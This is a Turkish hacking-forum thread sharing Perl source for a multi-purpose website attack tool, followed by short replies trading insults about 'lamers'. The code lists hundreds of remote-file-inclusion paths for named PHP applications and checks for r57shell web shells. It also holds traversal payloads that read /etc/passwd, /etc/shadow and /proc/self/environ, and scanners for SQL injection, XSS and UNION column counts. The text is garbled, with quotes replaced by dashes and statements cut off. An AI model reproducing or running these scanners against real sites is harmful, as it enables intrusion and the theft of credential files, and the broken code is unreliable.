$rfi312="PHPNews/auth.php?path=-;
$rfi313="include/print_category.php?dir=-;
$rfi314="skin/zero_vote/login.php?dir=-;
$rfi315="skin/zero_vote/setup.php?dir=-;
$rfi316="skin/zero_vote/ask_password.php?dir=-;
$rfi317="gui/include/sql.php?include_path=-;
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=-;
$rfi319="email.php?login=cer_skin=-;
$rfi320="PhotoGal/ops/gals.php?news_file=-;
$rfi321="index.php?custom=-;
$rfi322="loginout.php?cutepath=-;
$rfi323="oneadmin/config.php?path[docroot]=-;
$rfi324="xcomic/initialize.php?xcomicRootPath=-;
$rfi325="skin/zero_vote/setup.php?dir=-;
$rfi326="skin/zero_vote/error.php? dir=-;
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=-;
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=-;
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=-;
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=-;
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=-;
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=-;
$rfi333="src/index_overview.inc.php?config[path_src_include]=-;
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=-;
$rfi335="src/index_image.inc.php?config[path_src_include]=-;
$rfi336="src/image-gd.class.php?config[path_src_include]=-;
$rfi337="src/image.class.php?config[path_src_include]=-;
$rfi338="src/album.class.php?config[path_src_include]=-;
$rfi339="src/show_random.inc.php?config[path_src_include]=-;
$rfi340="src/main.inc.php?config[path_src_include]=-;
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=-;
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=-;
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=-;
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=-;
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=-;
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=-;
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=-;
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=-;
$rfi349="src/index_overview.inc.php?config[path_src_include]=-;
$rfi350="src/image-gd.class.php?config[path_src_include]=-;
$rfi351="src/image.class.php?config[image_module]=-;
$rfi352="src/album.class.php?config[path_src_include]=-;
$rfi353="src/show_random.inc.php?config[path_src_include]=-;
$rfi353="src/main.inc.php?config[path_src_include]=-;
$rfi354="includes/db_adodb.php?baseDir=-;
$rfi355="includes/db_connect.php?baseDir=-;
$rfi356="includes/session.php?baseDir=-;
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=-;
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=-;
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=-;
$rfi360="modules/admin/vw_usr_roles.php?baseDir=-;
$rfi361="modules/public/calendar.php?baseDir=-;
$rfi362="modules/public/date_format.php?baseDir=-;
$rfi363="modules/tasks/gantt.php?baseDir=-;
$rfi364="mantis/login_page.php?g_meta_include_file=-;
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=-;
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=-;
$rfi367="dotproject/modules/files/index_table.php?root_dir=-;
$rfi368="nukebrowser.php?filnavn=-;
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=-;
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=-;
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=-;
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=-;
$rfi373="includes/calendar.php?phpc_root_path=-;
$rfi374="includes/setup.php?phpc_root_path=-;
$rfi375="phpBB/admin/admin_styles.php?mode=-;
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=-;
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=-;
$rfi378="inc/pipe.php?HCL_path=-;
$rfi379="include/write.php?dir=-;
$rfi380="becommunity/community/index.php?pageurl=-;
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=-;
$rfi383="modules/agendax/addevent.inc.php?agendax_path=-;
$rfi384="shoutbox/expanded.php?conf=-;
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi386="index.php?page=-;
$rfi387="index.php?pag=-;
$rfi388="index.php?include=-;
$rfi389="index.php?content=-;
$rfi390="index.php?cont=-;
$rfi391="index.php?c=-;
$rfi392="modules/My_eGallery/index.php?basepath=-;
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=-;
$rfi394="journal.php?m=-;
$rfi395="index.php?m=-;
$rfi396="links.php?c=-;
$rfi397="forums.php?m=-;
$rfi398="list.php?c=-;
$rfi399="user.php?xoops_redirect=-;
$rfi400="index.php?id=-;
$rfi401="r.php?url=-;
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=-;
$rfi403="inc/formmail.inc.php?script_root=-;
$rfi404="include/init.inc.php?G_PATH=-;
$rfi405="backend/addons/links/index.php?PATH=-;
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=-;
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=-;
$rfi408="protection.php?siteurl=-;
$rfi409="htmltonuke.php?filnavn=-;
$rfi410="mail_autocheck.php?pm_path=-;
$rfi411="index.php?p=-;
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=-;
$rfi413="e107/e107_handlers/secure_img_render.php?p=-;
$rfi414="include/new-visitor.inc.php?lvc_include_dir=-;
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=-;
$rfi416="library/editor/editor.php?root=-;
$rfi417="library/lib.php?root=-;
$rfi418="zentrack/index.php?configFile=-;
$rfi419="pivot/modules/module_db.php?pivot_path=-;
$rfi420="myPHPCalendar/admin.php?cal_dir=-;
$rfi421="index.php/main.php?x=-;
$rfi422="os/pointer.php?url=-;
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=-;
$rfi424="db.php?path_local=-;
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=-;
$rfi426="index.php?kietu[url_hit]=-;
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=-;
$rfi428="Sources/Packages.php?sourcedir=-;
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=-;
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=-;

$int = $values[ rand(4) ];
for($int=1;$intnew(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,->>file.txt");
print FILE -$url2\n";
close(FILE);
print -$url2 is vulnerable..\n";
{goto Mainmenu;}
}}
}
}

sub lfi_scanner {

use HTTP::Request;
use LWP::UserAgent;
system ("clear");
print q{

#################################
# RFI SCANNER #
#################################

};
sleep (1);
print -\n";
menu:;
print "1. Passwd,Log";
print "Scan Files Of /etc/ Directory\n";
print "2. Environ";
print "Scan Environ File For Inject Shell By U-Agent\n";

print -\nEnter Your choise: -;
$menu = ;
if ($menu =~ /1/){
goto lfi;
}
if ($menu =~ /2/){
goto env;
}
else {
print"\n\n";
print -\t\tUnknow Choise!\n";
goto menu;
};

lfi:;
print -\n\n";
print -\t\t\tWelcome To /etc/ Section\n\n";
print -\t Insert Target (http://www.target.com/index.php?page=)\n";
print -\t Target: -;
$host=;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print -\n\n";
print -[+]Working...\n";
print -\n\n";
@lfi = (-../etc/passwd'
,
-../../
etc/passwd',
-../../../etc/passwd'
,
-../../../../
etc/passwd',
-../../../../../etc/passwd'
,
-../../../../../../
etc/passwd',
-../../../../../../../etc/passwd'
,
-../../../../../../../../
etc/passwd',
-../../../../../../../../../etc/passwd'
,
-../../../../../../../../../../
etc/passwd',
-../../../../../../../../../../../etc/passwd'
,
-../../../../../../../../../../../../
etc/passwd',
-../../../../../../../../../../../../../etc/passwd'
,
-../../../../../../../../../../../../../../
etc/passwd',
-../../../../../../../../../../../../../../../../etc/passwd'
,
-../../
etc/passwd%00',
-../../../etc/passwd%00'
,
-../../../../
etc/passwd%00',
-../../../../../etc/passwd%00'
,
-../../../../../../
etc/passwd%00',
-../../../../../../../etc/passwd%00'
,
-../../../../../../../../
etc/passwd%00',
-../../../../../../../../../etc/passwd%00'
,
-../../../../../../../../../../
etc/passwd%00',
-../../../../../../../../../../../etc/passwd%00'
,
-../../../../../../../../../../../../
etc/passwd%00',
-../../../../../../../../../../../../../etc/passwd%00'
,
-../../../../../../../../../../../../../../
etc/passwd%00',
-../../../../../../../../../../../../../../../../etc/passwd%00'
,
-../
etc/shadow',
-../../etc/shadow'
,
-../../../
etc/shadow',
-../../../../etc/shadow'
,
-../../../../../
etc/shadow',
-../../../../../../etc/shadow'
,
-../../../../../../../
etc/shadow',
-../../../../../../../../etc/shadow'
,
-../../../../../../../../../
etc/shadow',
-../../../../../../../../../../etc/shadow'
,
-../../../../../../../../../../../
etc/shadow',
-../../../../../../../../../../../../etc/shadow'
,
-../../../../../../../../../../../../../
etc/shadow',
-../../../../../../../../../../../../../../etc/shadow'
,
-../
etc/shadow%00',
-../../etc/shadow%00'
,
-../../../
etc/shadow%00',
-../../../../etc/shadow%00'
,
-../../../../../
etc/shadow%00',
-../../../../../../etc/shadow%00'
,
-../../../../../../../
etc/shadow%00',
-../../../../../../../../etc/shadow%00'
,
-../../../../../../../../../
etc/shadow%00',
-../../../../../../../../../../etc/shadow%00'
,
-../../../../../../../../../../../
etc/shadow%00',
-../../../../../../../../../../../../etc/shadow%00'
,
-../../../../../../../../../../../../../
etc/shadow%00',
-../../../../../../../../../../../../../../etc/shadow%00'
,
-../
etc/group',
-../../etc/group'
,
-../../../
etc/group',
-../../../../etc/group'
,
-../../../../../
etc/group',
-../../../../../../etc/group'
,
-../../../../../../../
etc/group',
-../../../../../../../../etc/group'
,
-../../../../../../../../../
etc/group',
-../../../../../../../../../../etc/group'
,
-../../../../../../../../../../../
etc/group',
-../../../../../../../../../../../../etc/group'
,
-../../../../../../../../../../../../../
etc/group',
-../../../../../../../../../../../../../../etc/group'
,
-../
etc/group%00',
-../../etc/group%00'
,
-../../../
etc/group%00',
-../../../../etc/group%00'
,
-../../../../../
etc/group%00',
-../../../../../../etc/group%00'
,
-../../../../../../../
etc/group%00',
-../../../../../../../../etc/group%00'
,
-../../../../../../../../../
etc/group%00',
-../../../../../../../../../../etc/group%00'
,
-../../../../../../../../../../../
etc/group%00',
-../../../../../../../../../../../../etc/group%00'
,
-../../../../../../../../../../../../../
etc/group%00',
-../../../../../../../../../../../../../../etc/group%00'
,
-../
etc/security/group',
-../../etc/security/group'
,
-../../../
etc/security/group',
-../../../../etc/security/group'
,
-../../../../../
etc/security/group',
-../../../../../../etc/security/group'
,
-../../../../../../../
etc/security/group',
-../../../../../../../../etc/security/group'
,
-../../../../../../../../../
etc/security/group',
-../../../../../../../../../../etc/security/group'
,
-../../../../../../../../../../../
etc/security/group',
-../etc/security/group%00'
,
-../../
etc/security/group%00',
-../../../etc/security/group%00'
,
-../../../../
etc/security/group%00',
-../../../../../etc/security/group%00'
,
-../../../../../../
etc/security/group%00',
-../../../../../../../etc/security/group%00'
,
-../../../../../../../../
etc/security/group%00',
-../../../../../../../../../etc/security/group%00'
,
-../../../../../../../../../../
etc/security/group%00',
-../../../../../../../../../../../etc/security/group%00'
,
-../
etc/security/passwd',
-../../etc/security/passwd'
,
-../../../
etc/security/passwd',
-../../../../etc/security/passwd'
,
-../../../../../
etc/security/passwd',
-../../../../../../etc/security/passwd'
,
-../../../../../../../
etc/security/passwd',
-../../../../../../../../etc/security/passwd'
,
-../../../../../../../../../
etc/security/passwd',
-../../../../../../../../../../etc/security/passwd'
,
-../../../../../../../../../../../
etc/security/passwd',
-../../../../../../../../../../../../etc/security/passwd'
,
-../../../../../../../../../../../../../
etc/security/passwd',
-../../../../../../../../../../../../../../etc/security/passwd'
,
-../
etc/security/passwd%00',
-../../etc/security/passwd%00'
,
-../../../
etc/security/passwd%00',
-../../../../etc/security/passwd%00'
,
-../../../../../
etc/security/passwd%00',
-../../../../../../etc/security/passwd%00'
,
-../../../../../../../
etc/security/passwd%00',
-../../../../../../../../etc/security/passwd%00'
,
-../../../../../../../../../
etc/security/passwd%00',
-../../../../../../../../../../etc/security/passwd%00'
,
-../../../../../../../../../../../
etc/security/passwd%00',
-../../../../../../../../../../../../etc/security/passwd%00'
,
-../../../../../../../../../../../../../
etc/security/passwd%00',
-../../../../../../../../../../../../../../etc/security/passwd%00'
,
-../
etc/security/user',
-../../etc/security/user'
,
-../../../
etc/security/user',
-../../../../etc/security/user'
,
-../../../../../
etc/security/user',
-../../../../../../etc/security/user'
,
-../../../../../../../
etc/security/user',
-../../../../../../../../etc/security/user'
,
-../../../../../../../../../
etc/security/user',
-../../../../../../../../../../etc/security/user'
,
-../../../../../../../../../../../
etc/security/user',
-../../../../../../../../../../../../etc/security/user'
,
-../../../../../../../../../../../../../
etc/security/user',
-../etc/security/user%00'
,
-../../
etc/security/user%00',
-../../../etc/security/user%00'
,
-../../../../
etc/security/user%00',
-../../../../../etc/security/user%00'
,
-../../../../../../
etc/security/user%00',
-../../../../../../../etc/security/user%00'
,
-../../../../../../../../
etc/security/user%00',
-../../../../../../../../../etc/security/user%00'
,
-../../../../../../../../../../
etc/security/user%00',
-../../../../../../../../../../../etc/security/user%00'
,
-../../../../../../../../../../../../
etc/security/user%00',
-../../../../../../../../../../../../../etc/security/user%00'
);

foreach 
$scan(@lfi){

$url $host.$scan;
$request HTTP::Request->new(GET=>$url);
$useragent LWP::UserAgent->new();

$response $useragent->request($request);
if (
$response->is_success && $response->content =~ /root:x:/) { $msg Vulnerability;}
else { 
$msg "Not Found";}
print -
$scan..........[$msg]\n";
}
env:;
print -\n\n"
;
print 
"Insert Target (http://www.target.com/index.php?page=)\n";
print 
"Target :-;
$host=;
chomp(
$host);
if(
$host !~ /http:\/\//) { $host = "http://$host"; };

print -\n\n";
print -[+]Working...\n"
;
print -\
n\n";

@env = (-../proc/self/environ',
-../../proc/self/environ',
-../../../proc/self/environ',
-../../../../proc/self/environ',
-../../../../../proc/self/environ',
-../../../../../../proc/self/environ',
-../../../../../../../proc/self/environ',
-../../../../../../../../proc/self/environ',
-../../../../../../../../../proc/self/environ',
-../../../../../../../../../../proc/self/environ',
-../../../../../../../../../../../proc/self/environ',
-../../../../../../../../../../../../proc/self/environ',
-../../../../../../../../../../../../../proc/self/environ',
-../../../../../../../../../../../../../../proc/self/environ',
-../proc/self/environ%00',
-../../proc/self/environ%00',
-../../../proc/self/environ%00',
-../../../../proc/self/environ%00',
-../../../../../proc/self/environ%00',
-../../../../../../proc/self/environ%00',
-../../../../../../../proc/self/environ%00',
-../../../../../../../../proc/self/environ%00',
-../../../../../../../../../proc/self/environ%00',
-../../../../../../../../../../proc/self/environ%00',
-../../../../../../../../../../../proc/self/environ%00',
-../../../../../../../../../../../../proc/self/environ%00',
-../../../../../../../../../../../../../proc/self/environ%00',
-../../../../../../../../../../../../../../proc/self/environ%00');

foreach 
$scan_env(@env){

$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if (
$response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { 
$msg = "Not Found";}
print -
$scan_env..........[$msg]\n";
}
{goto 
Mainmenu;}

sub sql_scanner {

print 
q{

###########################################
## SQL SCANNER ##
###########################################

};
print -\
nFilename with vuln sites(list):\n";
print "
Exsites.txtsqlvulntxt etc...\n\n";

chomp(
$list = );

system(-
$cmd");

print 
"Scanning! Please wait...\n\n";

open(LIST, -$list"); while() {

my 
$list = $_; chomp $list;

my 
$sql=---;

my 
$url=$list.$sql;

my 
$req=HTTP::Request->new(GET=>$url);
my 
$ua=LWP::UserAgent->new();
$ua->timeout(15);
my 
$resposta=$ua->request($req);

if(
$resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed quotation mark before/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/){
print -[+] Founded 
$url\n";
open(a, ->>sqlvulnlist.txt");
print a -
$url\n";
close(a);
}else{
print -[-] 
Not Found $url\n";
}}
print -\nAll results will be saved in sqlvulnlist.txt\n"
;
print -\
nPress ENTER To Return To Menu\n";
;
goto Mainmenu;
}
sub xss_scanner {

print q{

###########################################
## XSS SCANNER ##
###########################################

};
print -\nFilename with vuln sites(list):\n"
;
print 
"Ex: sites.txt, xssvulntxt etc...\n\n";

chomp($list = );

system(-$cmd");

print "
ScanningPlease wait...\n\n";

open(LIST, -
$list"); while() {

my $list $_chomp $list;

my $xss= ('s[1]->

XSSnew(GET=>$url);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $response=$ua->request($req);
if($response->content =~ /XSS/){
print -[+] Found $url\n";
open(a, ->>xssvulnlist.txt");
print a -$url\n";
close(a);
}else{
print -[-] Not Found $url\n"; }
}
print -\nAll results will be saved in xssvulnlist.txt\n";
print -\nPress ENTER To Return To Menu\n";
;
goto Mainmenu;
}
sub sqlfinder {

use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;

print q{

###########################################
## SQL Column Finder ##
###########################################

};
$add = -+-;
$end = ----;
print "Target: -;
$site = ;
print -\n\n";
print "Max number of columns to search: -;
$max = ;
print -\n\n";
print "Press ENTER To Start Searching!\n";
;
for ($i = 1; $i < $max; $i++) {
$link = $site . $add . '
UNION' . $add . 'SELECT' . $add;
$lol = --;
for ($lolz = 1; $lolz new(agent => '
Mozilla 5.2');
$web->timeout(60);
$response = $web->get($link);
if ($response->is_success) {
$_ = $response->content;
s/$lol//g;
if (/04041997\d{2}/) {
print -\nFinal number of columns : - . $i . -\n\n";
$_ = $link;
s/04041997//g;
print "Final URL:\n\n" . $_ . -\n\n\n";
;
goto Mainmenu;
}
}
else {
print "UPSSS! Error in website!\n";
;
goto Mainmenu;
}

Beğenenler:
#2
ajanlar lamerlerinin editlediklerini paylaşma bro salaklar 2 kod editleyince CODER olduklarını sanırlar (:
Beğenenler:
#3
(19-02-2014, Saat: 23:53)Asil_Mehmet Adlı Kullanıcıdan Alıntı: ajanlar lamerlerinin editlediklerini paylaşma bro salaklar 2 kod editleyince CODER olduklarını sanırlar (:

Katılıyorum cheesygrin
Beğenenler:
#4
Siz kullanmaya bakın kimin lamer olup olmadığınıdüşünmek bana düşmez exciting
Beğenenler:
#5
Asil mehmet Denen Dangalak Lamer Diyosunda Bizde arkadaşlardan 1 inin bildigi kadar bilgin varmı acaba
Beğenenler:
#6
İyiyiye benzıyor.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Yeni Kolay Site Hack :) ByMuh4mm3d 207 5,536 Dün, Saat: 19:44
Son Yorum: anubis
  Tv site dorkları Mrxxx 1 28 07-12-2016, Saat: 17:32
Son Yorum: the_zizil
  PHP ile IP Adresini Dosya yada Site Üzerinden Loglatmak KingSkrupellos 11 120 07-12-2016, Saat: 09:43
Son Yorum: the_zizil
  Manuel site sql bulma Stallk3r 5 904 06-12-2016, Saat: 20:43
Son Yorum: J3adJ3oy
  Hedef Sisteme Sızma Mentalistler 192 9,455 06-12-2016, Saat: 20:18
Son Yorum: J3adJ3oy
Anahtar Kelimeler

Hedef Site Attacker indir, Hedef Site Attacker Videosu, Hedef Site Attacker Online izle, Hedef Site Attacker Bedava indir, Hedef Site Attacker Yükle, Hedef Site Attacker Hakkında, Hedef Site Attacker Nedir, Hedef Site Attacker Free indir, Hedef Site Attacker Oyunu, Hedef Site Attacker Download


1 Ziyaretçi